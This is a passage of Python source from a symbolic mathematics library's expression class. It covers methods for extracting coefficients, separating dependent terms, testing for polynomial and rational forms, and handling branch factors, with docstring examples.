as_coefficient: separate the expression into a coefficient and factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
Examples
========
>>> from sympy import symbols
>>> from sympy.abc import x, y, z
You can select terms that have an explicit negative in front of them:
>>> (-x + 2*y).coeff(-1)
x
>>> (x - 2*y).coeff(-1)
2*y
You can select terms with no Rational coefficient:
>>> (x + 2*y).coeff(1)
x
>>> (3 + 2*x + 4*x**2).coeff(1)
0
You can select terms independent of x by making n=0; in this case
expr.as_independent(x)[0] is returned (and 0 will be returned instead
of None):
>>> (3 + 2*x + 4*x**2).coeff(x, 0)
3
>>> eq = ((x + 1)**3).expand() + 1
>>> eq
x**3 + 3*x**2 + 3*x + 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 2]
>>> eq -= 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 0]
You can select terms that have a numerical term in front of them:
>>> (-x - 2*y).coeff(2)
-y
>>> from sympy import sqrt
>>> (x + sqrt(2)*x).coeff(sqrt(2))
x
The matching is exact:
>>> (3 + 2*x + 4*x**2).coeff(x)
2
>>> (3 + 2*x + 4*x**2).coeff(x**2)
4
>>> (3 + 2*x + 4*x**2).coeff(x**3)
0
>>> (z*(x + y)**2).coeff((x + y)**2)
z
>>> (z*(x + y)**2).coeff(x + y)
0
In addition, no factoring is done, so 1 + z*(1 + y) is not obtained
from the following:
>>> (x + z*(x + x*y)).coeff(x)
1
If such factoring is desired, factor_terms can be used first:
>>> from sympy import factor_terms
>>> factor_terms(x + z*(x + x*y)).coeff(x)
z*(y + 1) + 1
>>> n, m, o = symbols('n m o', commutative=False)
>>> n.coeff(n)
1
>>> (3*n).coeff(n)
3
>>> (n*m + m*n*m).coeff(n) # = (1 + m)*n*m
1 + m
>>> (n*m + m*n*m).coeff(n, right=True) # = (1 + m)*n*m
m
If there is more than one possible coefficient 0 is returned:
>>> (n*m + m*n).coeff(n)
0
If there is only one possible coefficient, it is returned:
>>> (n*m + x*m*n).coeff(m*n)
x
>>> (n*m + x*m*n).coeff(m*n, right=1)
1
"""
x = sympify(x)
if not isinstance(x, Basic):
return S.Zero
n = as_int(n)
if not x:
return S.Zero
if x == self:
if n == 1:
return S.One
return S.Zero
if x is S.One:
co = [a for a in Add.make_args(self)
if a.as_coeff_Mul()[0] is S.One]
if not co:
return S.Zero
return Add(*co)
if n == 0:
if x.is_Add and self.is_Add:
c = self.coeff(x, right=right)
if not c:
return S.Zero
if not right:
return self - Add(*[a*x for a in Add.make_args(c)])
return self - Add(*[x*a for a in Add.make_args(c)])
return self.as_independent(x, as_Add=True)[0]
# continue with the full method, looking for this power of x:
x = x**n
def incommon(l1, l2):
if not l1 or not l2:
return []
n = min(len(l1), len(l2))
for i in range(n):
if l1[i] != l2[i]:
return l1[:i]
return l1[:]
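        # For example, incommon([A, B, C], [A, B, D]) returns the common
        # prefix [A, B], and incommon(l, []) returns [].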
def find(l, sub, first=True):
""" Find where list sub appears in list l. When ``first`` is True
            the first occurrence from the left is returned, else the last
            occurrence is returned. Return None if sub is not in l.
>> l = range(5)*2
>> find(l, [2, 3])
2
>> find(l, [2, 3], first=0)
7
>> find(l, [2, 4])
None
"""
if not sub or not l or len(sub) > len(l):
return None
n = len(sub)
if not first:
l.reverse()
sub.reverse()
for i in range(0, len(l) - n + 1):
if all(l[i + j] == sub[j] for j in range(n)):
break
else:
i = None
if not first:
l.reverse()
sub.reverse()
if i is not None and not first:
i = len(l) - (i + n)
return i
co = []
args = Add.make_args(self)
self_c = self.is_commutative
x_c = x.is_commutative
if self_c and not x_c:
return S.Zero
if self_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs = a.args_cnc(cset=True, warn=False)[0]
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*resid))
if co == []:
return S.Zero
elif co:
return Add(*co)
elif x_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*(list(resid) + nc)))
if co == []:
return S.Zero
elif co:
return Add(*co)
else: # both nc
xargs, nx = x.args_cnc(cset=True)
# find the parts that pass the commutative terms
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append((resid, nc))
# now check the non-comm parts
if not co:
return S.Zero
if all(n == co[0][1] for r, n in co):
ii = find(co[0][1], nx, right)
if ii is not None:
if not right:
return Mul(Add(*[Mul(*r) for r, c in co]), Mul(*co[0][1][:ii]))
else:
return Mul(*co[0][1][ii + len(nx):])
beg = reduce(incommon, (n[1] for n in co))
if beg:
ii = find(beg, nx, right)
if ii is not None:
if not right:
gcdc = co[0][0]
for i in range(1, len(co)):
gcdc = gcdc.intersection(co[i][0])
if not gcdc:
break
return Mul(*(list(gcdc) + beg[:ii]))
else:
m = ii + len(nx)
return Add(*[Mul(*(list(r) + n[m:])) for r, n in co])
end = list(reversed(
reduce(incommon, (list(reversed(n[1])) for n in co))))
if end:
ii = find(end, nx, right)
if ii is not None:
if not right:
return Add(*[Mul(*(list(r) + n[:-len(end) + ii])) for r, n in co])
else:
return Mul(*end[ii + len(nx):])
# look for single match
hit = None
for i, (r, n) in enumerate(co):
ii = find(n, nx, right)
if ii is not None:
if not hit:
hit = ii, r, n
else:
break
else:
if hit:
ii, r, n = hit
if not right:
return Mul(*(list(r) + n[:ii]))
else:
return Mul(*n[ii + len(nx):])
return S.Zero
def as_expr(self, *gens):
"""
Convert a polynomial to a SymPy expression.
Examples
========
>>> from sympy import sin
>>> from sympy.abc import x, y
>>> f = (x**2 + x*y).as_poly(x, y)
>>> f.as_expr()
x**2 + x*y
>>> sin(x).as_expr()
sin(x)
"""
return self
def as_coefficient(self, expr):
"""
Extracts symbolic coefficient at the given expression. In
other words, this functions separates 'self' into the product
of 'expr' and 'expr'-free coefficient. If such separation
is not possible it will return None.
Examples
========
>>> from sympy import E, pi, sin, I, Poly
>>> from sympy.abc import x
>>> E.as_coefficient(E)
1
>>> (2*E).as_coefficient(E)
2
>>> (2*sin(E)*E).as_coefficient(E)
Two terms have E in them so a sum is returned. (If one were
desiring the coefficient of the term exactly matching E then
the constant from the returned expression could be selected.
Or, for greater precision, a method of Poly can be used to
indicate the desired term from which the coefficient is
desired.)
>>> (2*E + x*E).as_coefficient(E)
x + 2
>>> _.args[0] # just want the exact match
2
>>> p = Poly(2*E + x*E); p
Poly(x*E + 2*E, x, E, domain='ZZ')
>>> p.coeff_monomial(E)
2
>>> p.nth(0, 1)
2
Since the following cannot be written as a product containing
E as a factor, None is returned. (If the coefficient ``2*x`` is
desired then the ``coeff`` method should be used.)
>>> (2*E*x + x).as_coefficient(E)
>>> (2*E*x + x).coeff(E)
2*x
>>> (E*(x + 1) + x).as_coefficient(E)
>>> (2*pi*I).as_coefficient(pi*I)
2
>>> (2*I).as_coefficient(pi*I)
See Also
========
        coeff: return sum of terms having a given factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
"""
r = self.extract_multiplicatively(expr)
if r and not r.has(expr):
return r
def as_independent(self, *deps, **hint):
"""
        A mostly naive separation of a Mul or Add into arguments that are or
        are not dependent on deps. To obtain as complete a separation of variables
as possible, use a separation method first, e.g.:
* separatevars() to change Mul, Add and Pow (including exp) into Mul
* .expand(mul=True) to change Add or Mul into Add
* .expand(log=True) to change log expr into an Add
The only non-naive thing that is done here is to respect noncommutative
ordering of variables and to always return (0, 0) for `self` of zero
regardless of hints.
For nonzero `self`, the returned tuple (i, d) has the
following interpretation:
        * i will have no variable that appears in deps
* d will be 1 or else have terms that contain variables that are in deps
* if self is an Add then self = i + d
* if self is a Mul then self = i*d
* otherwise (self, S.One) or (S.One, self) is returned.
To force the expression to be treated as an Add, use the hint as_Add=True
Examples
========
-- self is an Add
>>> from sympy import sin, cos, exp
>>> from sympy.abc import x, y, z
>>> (x + x*y).as_independent(x)
(0, x*y + x)
>>> (x + x*y).as_independent(y)
(x, x*y)
>>> (2*x*sin(x) + y + x + z).as_independent(x)
(y + z, 2*x*sin(x) + x)
>>> (2*x*sin(x) + y + x + z).as_independent(x, y)
(z, 2*x*sin(x) + x + y)
-- self is a Mul
>>> (x*sin(x)*cos(y)).as_independent(x)
(cos(y), x*sin(x))
non-commutative terms cannot always be separated out when self is a Mul
>>> from sympy import symbols
>>> n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
>>> (n1 + n1*n2).as_independent(n2)
(n1, n1*n2)
>>> (n2*n1 + n1*n2).as_independent(n2)
(0, n1*n2 + n2*n1)
>>> (n1*n2*n3).as_independent(n1)
(1, n1*n2*n3)
>>> (n1*n2*n3).as_independent(n2)
(n1, n2*n3)
>>> ((x-n1)*(x-y)).as_independent(x)
(1, (x - y)*(x - n1))
-- self is anything else:
>>> (sin(x)).as_independent(x)
(1, sin(x))
>>> (sin(x)).as_independent(y)
(sin(x), 1)
>>> exp(x+y).as_independent(x)
(1, exp(x + y))
-- force self to be treated as an Add:
>>> (3*x).as_independent(x, as_Add=True)
(0, 3*x)
-- force self to be treated as a Mul:
>>> (3+x).as_independent(x, as_Add=False)
(1, x + 3)
>>> (-3+x).as_independent(x, as_Add=False)
(1, x - 3)
Note how the below differs from the above in making the
constant on the dep term positive.
>>> (y*(-3+x)).as_independent(x)
(y, x - 3)
-- use .as_independent() for true independence testing instead
of .has(). The former considers only symbols in the free
symbols while the latter considers all symbols
>>> from sympy import Integral
>>> I = Integral(x, (x, 1, 2))
>>> I.has(x)
True
>>> x in I.free_symbols
False
>>> I.as_independent(x) == (I, 1)
True
>>> (I + x).as_independent(x) == (I, x)
True
Note: when trying to get independent terms, a separation method
might need to be used first. In this case, it is important to keep
track of what you send to this routine so you know how to interpret
the returned values
>>> from sympy import separatevars, log
>>> separatevars(exp(x+y)).as_independent(x)
(exp(y), exp(x))
>>> (x + x*y).as_independent(y)
(x, x*y)
>>> separatevars(x + x*y).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).as_independent(y)
(x, y + 1)
>>> (x*(1 + y)).expand(mul=True).as_independent(y)
(x, x*y)
>>> a, b=symbols('a b', positive=True)
>>> (log(a*b).expand(log=True)).as_independent(b)
(log(a), log(b))
See Also
========
.separatevars(), .expand(log=True), Add.as_two_terms(),
Mul.as_two_terms(), .as_coeff_add(), .as_coeff_mul()
"""
from .symbol import Symbol
from .add import _unevaluated_Add
from .mul import _unevaluated_Mul
from sympy.utilities.iterables import sift
if self.is_zero:
return S.Zero, S.Zero
func = self.func
if hint.get('as_Add', func is Add):
want = Add
else:
want = Mul
if func is not want and (func is Add or func is Mul):
return (want.identity, self)
# sift out deps into symbolic and other and ignore
# all symbols but those that are in the free symbols
sym = set()
other = []
for d in deps:
if isinstance(d, Symbol): # Symbol.is_Symbol is True
sym.add(d)
else:
other.append(d)
def has(e):
"""return the standard has() if there are no literal symbols, else
check to see that symbol-deps are in the free symbols."""
has_other = e.has(*other)
if not sym:
return has_other
return has_other or e.has(*(e.free_symbols & sym))
if (want is not func or
func is not Add and func is not Mul):
if has(self):
return (want.identity, self)
else:
return (self, want.identity)
else:
if func is Add:
args = list(self.args)
else:
args, nc = self.args_cnc()
d = sift(args, lambda x: has(x))
depend = d[True]
indep = d[False]
if func is Add: # all terms were treated as commutative
return (Add(*indep), _unevaluated_Add(*depend))
else: # handle noncommutative by stopping at first dependent term
for i, n in enumerate(nc):
if has(n):
depend.extend(nc[i:])
break
indep.append(n)
return Mul(*indep), (
Mul(*depend, evaluate=False) if nc else
_unevaluated_Mul(*depend))
def as_real_imag(self, deep=True, **hints):
"""Performs complex expansion on 'self' and returns a tuple
        containing the collected real and imaginary parts. This
        method should not be confused with the re() and im() functions,
        which do not perform complex expansion at evaluation.
However it is possible to expand both re() and im()
functions and get exactly the same results as with
a single call to this function.
>>> from sympy import symbols, I
>>> x, y = symbols('x,y', real=True)
>>> (x + y*I).as_real_imag()
(x, y)
>>> from sympy.abc import z, w
>>> (z + w*I).as_real_imag()
(re(z) - im(w), re(w) + im(z))
"""
from sympy import im, re
if hints.get('ignore') == self:
return None
else:
return (re(self), im(self))
def as_powers_dict(self):
"""Return self as a dictionary of factors with each factor being
treated as a power. The keys are the bases of the factors and the
values, the corresponding exponents. The resulting dictionary should
be used with caution if the expression is a Mul and contains non-
commutative factors since the order that they appeared will be lost in
the dictionary."""
d = defaultdict(int)
d.update(dict([self.as_base_exp()]))
return d
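    # For example (illustrating the description above), (x*y**2).as_powers_dict()
    # maps x to 1 and y to 2, while (x**3).as_powers_dict() has the single
    # entry x: 3.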
def as_coefficients_dict(self):
"""Return a dictionary mapping terms to their Rational coefficient.
Since the dictionary is a defaultdict, inquiries about terms which
were not present will return a coefficient of 0. If an expression is
not an Add it is considered to have a single term.
Examples
========
>>> from sympy.abc import a, x
>>> (3*x + a*x + 4).as_coefficients_dict()
{1: 4, x: 3, a*x: 1}
>>> _[a]
0
>>> (3*a*x).as_coefficients_dict()
{a*x: 3}
"""
c, m = self.as_coeff_Mul()
if not c.is_Rational:
c = S.One
m = self
d = defaultdict(int)
d.update({m: c})
return d
def as_base_exp(self):
# a -> b ** e
return self, S.One
def as_coeff_mul(self, *deps, **kwargs):
"""Return the tuple (c, args) where self is written as a Mul, ``m``.
c should be a Rational multiplied by any terms of the Mul that are
independent of deps.
args should be a tuple of all other terms of m; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is a Mul or not but
you want to treat self as a Mul or if you want to process the
individual arguments of the tail of self as a Mul.
- if you know self is a Mul and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail;
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_mul()
(3, ())
>>> (3*x*y).as_coeff_mul()
(3, (x, y))
>>> (3*x*y).as_coeff_mul(x)
(3*y, (x,))
>>> (3*y).as_coeff_mul(x)
(3*y, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.One, (self,)
def as_coeff_add(self, *deps):
"""Return the tuple (c, args) where self is written as an Add, ``a``.
c should be a Rational added to any terms of the Add that are
independent of deps.
args should be a tuple of all other terms of ``a``; args is empty
if self is a Number or if self is independent of deps (when given).
This should be used when you don't know if self is an Add or not but
you want to treat self as an Add or if you want to process the
individual arguments of the tail of self as an Add.
- if you know self is an Add and want only the head, use self.args[0];
- if you don't want to process the arguments of the tail but need the
tail then use self.as_two_terms() which gives the head and tail.
- if you want to split self into an independent and dependent parts
use ``self.as_independent(*deps)``
>>> from sympy import S
>>> from sympy.abc import x, y
>>> (S(3)).as_coeff_add()
(3, ())
>>> (3 + x).as_coeff_add()
(3, (x,))
>>> (3 + x + y).as_coeff_add(x)
(y + 3, (x,))
>>> (3 + y).as_coeff_add(x)
(y + 3, ())
"""
if deps:
if not self.has(*deps):
return self, tuple()
return S.Zero, (self,)
def primitive(self):
"""Return the positive Rational that can be extracted non-recursively
from every term of self (i.e., self is treated like an Add). This is
like the as_coeff_Mul() method but primitive always extracts a positive
Rational (never a negative or a Float).
Examples
========
>>> from sympy.abc import x
>>> (3*(x + 1)**2).primitive()
(3, (x + 1)**2)
>>> a = (6*x + 2); a.primitive()
(2, 3*x + 1)
>>> b = (x/2 + 3); b.primitive()
(1/2, x + 6)
>>> (a*b).primitive() == (1, a*b)
True
"""
if not self:
return S.One, S.Zero
c, r = self.as_coeff_Mul(rational=True)
if c.is_negative:
c, r = -c, -r
return c, r
def as_content_primitive(self, radical=False, clear=True):
"""This method should recursively remove a Rational from all arguments
and return that (content) and the new self (primitive). The content
should always be positive and ``Mul(*foo.as_content_primitive()) == foo``.
        The primitive need not be in canonical form and should try to preserve
the underlying structure if possible (i.e. expand_mul should not be
applied to self).
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y, z
>>> eq = 2 + 2*x + 2*y*(3 + 3*y)
The as_content_primitive function is recursive and retains structure:
>>> eq.as_content_primitive()
(2, x + 3*y*(y + 1) + 1)
Integer powers will have Rationals extracted from the base:
>>> ((2 + 6*x)**2).as_content_primitive()
(4, (3*x + 1)**2)
>>> ((2 + 6*x)**(2*y)).as_content_primitive()
(1, (2*(3*x + 1))**(2*y))
Terms may end up joining once their as_content_primitives are added:
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(11, x*(y + 1))
>>> ((3*(x*(1 + y)) + 2*x*(3 + 3*y))).as_content_primitive()
(9, x*(y + 1))
>>> ((3*(z*(1 + y)) + 2.0*x*(3 + 3*y))).as_content_primitive()
(1, 6.0*x*(y + 1) + 3*z*(y + 1))
>>> ((5*(x*(1 + y)) + 2*x*(3 + 3*y))**2).as_content_primitive()
(121, x**2*(y + 1)**2)
>>> ((5*(x*(1 + y)) + 2.0*x*(3 + 3*y))**2).as_content_primitive()
(1, 121.0*x**2*(y + 1)**2)
Radical content can also be factored out of the primitive:
>>> (2*sqrt(2) + 4*sqrt(10)).as_content_primitive(radical=True)
(2, sqrt(2)*(1 + 2*sqrt(5)))
If clear=False (default is True) then content will not be removed
from an Add if it can be distributed to leave one or more
terms with integer coefficients.
>>> (x/2 + y).as_content_primitive()
(1/2, x + 2*y)
>>> (x/2 + y).as_content_primitive(clear=False)
(1, x/2 + y)
"""
return S.One, self
def as_numer_denom(self):
""" expression -> a/b -> a, b
This is just a stub that should be defined by
an object's class methods to get anything else.
See Also
========
normal: return a/b instead of a, b
"""
return self, S.One
def normal(self):
n, d = self.as_numer_denom()
if d is S.One:
return n
return n/d
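    # For example, (x/y).as_numer_denom() gives (x, y) and (x/y).normal()
    # rebuilds the quotient x/y; an expression with no denominator, e.g. x + 1,
    # gives (x + 1, 1) and is returned unchanged by normal().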
def extract_multiplicatively(self, c):
"""Return None if it's not possible to make self in the form
c * something in a nice way, i.e. preserving the properties
of arguments of self.
>>> from sympy import symbols, Rational
>>> x, y = symbols('x,y', real=True)
>>> ((x*y)**3).extract_multiplicatively(x**2 * y)
x*y**2
>>> ((x*y)**3).extract_multiplicatively(x**4 * y)
>>> (2*x).extract_multiplicatively(2)
x
>>> (2*x).extract_multiplicatively(3)
>>> (Rational(1, 2)*x).extract_multiplicatively(3)
x/6
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.One:
return self
elif c == self:
return S.One
if c.is_Add:
cc, pc = c.primitive()
if cc is not S.One:
c = Mul(cc, pc, evaluate=False)
if c.is_Mul:
a, b = c.as_two_terms()
x = self.extract_multiplicatively(a)
if x is not None:
return x.extract_multiplicatively(b)
quotient = self / c
if self.is_Number:
if self is S.Infinity:
if c.is_positive:
return S.Infinity
elif self is S.NegativeInfinity:
if c.is_negative:
return S.Infinity
elif c.is_positive:
return S.NegativeInfinity
elif self is S.ComplexInfinity:
if not c.is_zero:
return S.ComplexInfinity
elif self.is_Integer:
if not quotient.is_Integer:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Rational:
if not quotient.is_Rational:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_Float:
if not quotient.is_Float:
return None
elif self.is_positive and quotient.is_negative:
return None
else:
return quotient
elif self.is_NumberSymbol or self.is_Symbol or self is S.ImaginaryUnit:
if quotient.is_Mul and len(quotient.args) == 2:
if quotient.args[0].is_Integer and quotient.args[0].is_positive and quotient.args[1] == self:
return quotient
elif quotient.is_Integer and c.is_Number:
return quotient
elif self.is_Add:
cs, ps = self.primitive()
if cs is not S.One:
return Mul(cs, ps, evaluate=False).extract_multiplicatively(c)
newargs = []
for arg in self.args:
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
newargs.append(newarg)
else:
return None
return Add(*newargs)
elif self.is_Mul:
args = list(self.args)
for i, arg in enumerate(args):
newarg = arg.extract_multiplicatively(c)
if newarg is not None:
args[i] = newarg
return Mul(*args)
elif self.is_Pow:
if c.is_Pow and c.base == self.base:
new_exp = self.exp.extract_additively(c.exp)
if new_exp is not None:
return self.base ** (new_exp)
elif c == self.base:
new_exp = self.exp.extract_additively(1)
if new_exp is not None:
return self.base ** (new_exp)
def extract_additively(self, c):
"""Return self - c if it's possible to subtract c from self and
make all matching coefficients move towards zero, else return None.
Examples
========
>>> from sympy.abc import x, y
>>> e = 2*x + 3
>>> e.extract_additively(x + 1)
x + 2
>>> e.extract_additively(3*x)
>>> e.extract_additively(4)
>>> (y*(x + 1)).extract_additively(x + 1)
>>> ((x + 1)*(x + 2*y + 1) + 3).extract_additively(x + 1)
(x + 1)*(x + 2*y) + 3
Sometimes auto-expansion will return a less simplified result
than desired; gcd_terms might be used in such cases:
>>> from sympy import gcd_terms
>>> (4*x*(y + 1) + y).extract_additively(x)
4*x*(y + 1) + x*(4*y + 3) - x*(4*y + 4) + y
>>> gcd_terms(_)
x*(4*y + 3) + y
See Also
========
extract_multiplicatively
coeff
as_coefficient
"""
c = sympify(c)
if self is S.NaN:
return None
if c is S.Zero:
return self
elif c == self:
return S.Zero
elif self is S.Zero:
return None
if self.is_Number:
if not c.is_Number:
return None
co = self
diff = co - c
# XXX should we match types? i.e should 3 - .1 succeed?
if (co > 0 and diff > 0 and diff < co or
co < 0 and diff < 0 and diff > co):
return diff
return None
if c.is_Number:
co, t = self.as_coeff_Add()
xa = co.extract_additively(c)
if xa is None:
return None
return xa + t
# handle the args[0].is_Number case separately
# since we will have trouble looking for the coeff of
# a number.
if c.is_Add and c.args[0].is_Number:
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
h, t = c.as_coeff_Add()
sh, st = self.as_coeff_Add()
xa = sh.extract_additively(h)
if xa is None:
return None
xa2 = st.extract_additively(t)
if xa2 is None:
return None
return xa + xa2
# whole term as a term factor
co = self.coeff(c)
xa0 = (co.extract_additively(1) or 0)*c
if xa0:
diff = self - co*c
return (xa0 + (diff.extract_additively(c) or diff)) or None
# term-wise
coeffs = []
for a in Add.make_args(c):
ac, at = a.as_coeff_Mul()
co = self.coeff(at)
if not co:
return None
coc, cot = co.as_coeff_Add()
xa = coc.extract_additively(ac)
if xa is None:
return None
self -= co*at
coeffs.append((cot + xa)*at)
coeffs.append(self)
return Add(*coeffs)
def could_extract_minus_sign(self):
"""Canonical way to choose an element in the set {e, -e} where
e is any expression. If the canonical element is e, we have
e.could_extract_minus_sign() == True, else
e.could_extract_minus_sign() == False.
For any expression, the set ``{e.could_extract_minus_sign(),
(-e).could_extract_minus_sign()}`` must be ``{True, False}``.
>>> from sympy.abc import x, y
>>> (x-y).could_extract_minus_sign() != (y-x).could_extract_minus_sign()
True
"""
negative_self = -self
self_has_minus = (self.extract_multiplicatively(-1) is not None)
negative_self_has_minus = (
(negative_self).extract_multiplicatively(-1) is not None)
if self_has_minus != negative_self_has_minus:
return self_has_minus
else:
if self.is_Add:
# We choose the one with less arguments with minus signs
all_args = len(self.args)
negative_args = len([False for arg in self.args if arg.could_extract_minus_sign()])
positive_args = all_args - negative_args
if positive_args > negative_args:
return False
elif positive_args < negative_args:
return True
elif self.is_Mul:
# We choose the one with an odd number of minus signs
num, den = self.as_numer_denom()
args = Mul.make_args(num) + Mul.make_args(den)
arg_signs = [arg.could_extract_minus_sign() for arg in args]
negative_args = list(filter(None, arg_signs))
return len(negative_args) % 2 == 1
# As a last resort, we choose the one with greater value of .sort_key()
return bool(self.sort_key() < negative_self.sort_key())
def extract_branch_factor(self, allow_half=False):
"""
Try to write self as ``exp_polar(2*pi*I*n)*z`` in a nice way.
Return (z, n).
>>> from sympy import exp_polar, I, pi
>>> from sympy.abc import x, y
>>> exp_polar(I*pi).extract_branch_factor()
(exp_polar(I*pi), 0)
>>> exp_polar(2*I*pi).extract_branch_factor()
(1, 1)
>>> exp_polar(-pi*I).extract_branch_factor()
(exp_polar(I*pi), -1)
>>> exp_polar(3*pi*I + x).extract_branch_factor()
(exp_polar(x + I*pi), 1)
>>> (y*exp_polar(-5*pi*I)*exp_polar(3*pi*I + 2*pi*x)).extract_branch_factor()
(y*exp_polar(2*pi*x), -1)
>>> exp_polar(-I*pi/2).extract_branch_factor()
(exp_polar(-I*pi/2), 0)
If allow_half is True, also extract exp_polar(I*pi):
>>> exp_polar(I*pi).extract_branch_factor(allow_half=True)
(1, 1/2)
>>> exp_polar(2*I*pi).extract_branch_factor(allow_half=True)
(1, 1)
>>> exp_polar(3*I*pi).extract_branch_factor(allow_half=True)
(1, 3/2)
>>> exp_polar(-I*pi).extract_branch_factor(allow_half=True)
(1, -1/2)
"""
from sympy import exp_polar, pi, I, ceiling, Add
n = S(0)
res = S(1)
args = Mul.make_args(self)
exps = []
for arg in args:
if arg.func is exp_polar:
exps += [arg.exp]
else:
res *= arg
piimult = S(0)
extras = []
while exps:
exp = exps.pop()
if exp.is_Add:
exps += exp.args
continue
if exp.is_Mul:
coeff = exp.as_coefficient(pi*I)
if coeff is not None:
piimult += coeff
continue
extras += [exp]
if not piimult.free_symbols:
coeff = piimult
tail = ()
else:
coeff, tail = piimult.as_coeff_add(*piimult.free_symbols)
# round down to nearest multiple of 2
branchfact = ceiling(coeff/2 - S(1)/2)*2
n += branchfact/2
c = coeff - branchfact
if allow_half:
nc = c.extract_additively(1)
if nc is not None:
n += S(1)/2
c = nc
newexp = pi*I*Add(*((c, ) + tail)) + Add(*extras)
if newexp != 0:
res *= exp_polar(newexp)
return res, n
def _eval_is_polynomial(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_polynomial(self, *syms):
"""
Return True if self is a polynomial in syms and False otherwise.
This checks if self is an exact polynomial in syms. This function
returns False for expressions that are "polynomials" with symbolic
exponents. Thus, you should be able to apply polynomial algorithms to
expressions for which this returns True, and Poly(expr, \*syms) should
work if and only if expr.is_polynomial(\*syms) returns True. The
polynomial does not have to be in expanded form. If no symbols are
given, all free symbols in the expression will be used.
This is not part of the assumptions system. You cannot do
Symbol('z', polynomial=True).
Examples
========
>>> from sympy import Symbol
>>> x = Symbol('x')
>>> ((x**2 + 1)**4).is_polynomial(x)
True
>>> ((x**2 + 1)**4).is_polynomial()
True
>>> (2**x + 1).is_polynomial(x)
False
>>> n = Symbol('n', nonnegative=True, integer=True)
>>> (x**n + 1).is_polynomial(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a polynomial to
become one.
>>> from sympy import sqrt, factor, cancel
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)
>>> a.is_polynomial(y)
False
>>> factor(a)
y + 1
>>> factor(a).is_polynomial(y)
True
>>> b = (y**2 + 2*y + 1)/(y + 1)
>>> b.is_polynomial(y)
False
>>> cancel(b)
y + 1
>>> cancel(b).is_polynomial(y)
True
See also .is_rational_function()
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant polynomial
return True
else:
return self._eval_is_polynomial(syms)
def _eval_is_rational_function(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_rational_function(self, *syms):
"""
Test whether function is a ratio of two polynomials in the given
symbols, syms. When syms is not given, all free symbols will be used.
The rational function does not have to be in expanded or in any kind of
canonical form.
This function returns False for expressions that are "rational
functions" with symbolic exponents. Thus, you should be able to call
.as_numer_denom() and apply polynomial algorithms to the result for
expressions for which this returns True.
This is not part of the assumptions system. You cannot do
Symbol('z', rational_function=True).
Examples
========
>>> from sympy import Symbol, sin
>>> from sympy.abc import x, y
>>> (x/y).is_rational_function()
True
>>> (x**2).is_rational_function()
True
>>> (x/sin(y)).is_rational_function(y)
False
>>> n = Symbol('n', integer=True)
>>> (x**n + 1).is_rational_function(x)
False
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be a rational function
to become one.
>>> from sympy import sqrt, factor
>>> y = Symbol('y', positive=True)
>>> a = sqrt(y**2 + 2*y + 1)/y
>>> a.is_rational_function(y)
False
>>> factor(a)
(y + 1)/y
>>> factor(a).is_rational_function(y)
True
See also is_algebraic_expr().
"""
if self in [S.NaN, S.Infinity, -S.Infinity, S.ComplexInfinity]:
return False
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant rational function
return True
else:
return self._eval_is_rational_function(syms)
def _eval_is_algebraic_expr(self, syms):
if self.free_symbols.intersection(syms) == set([]):
return True
return False
def is_algebraic_expr(self, *syms):
"""
This tests whether a given expression is algebraic or not, in the
given symbols, syms. When syms is not given, all free symbols
        will be used. The expression does not have to be in expanded
or in any kind of canonical form.
This function returns False for expressions that are "algebraic
expressions" with symbolic exponents. This is a simple extension to the
is_rational_function, including rational exponentiation.
Examples
========
>>> from sympy import Symbol, sqrt
>>> x = Symbol('x', real=True)
>>> sqrt(1 + x).is_rational_function()
False
>>> sqrt(1 + x).is_algebraic_expr()
True
This function does not attempt any nontrivial simplifications that may
result in an expression that does not appear to be an algebraic
expression to become one.
>>> from sympy import exp, factor
>>> a = sqrt(exp(x)**2 + 2*exp(x) + 1)/(exp(x) + 1)
>>> a.is_algebraic_expr(x)
False
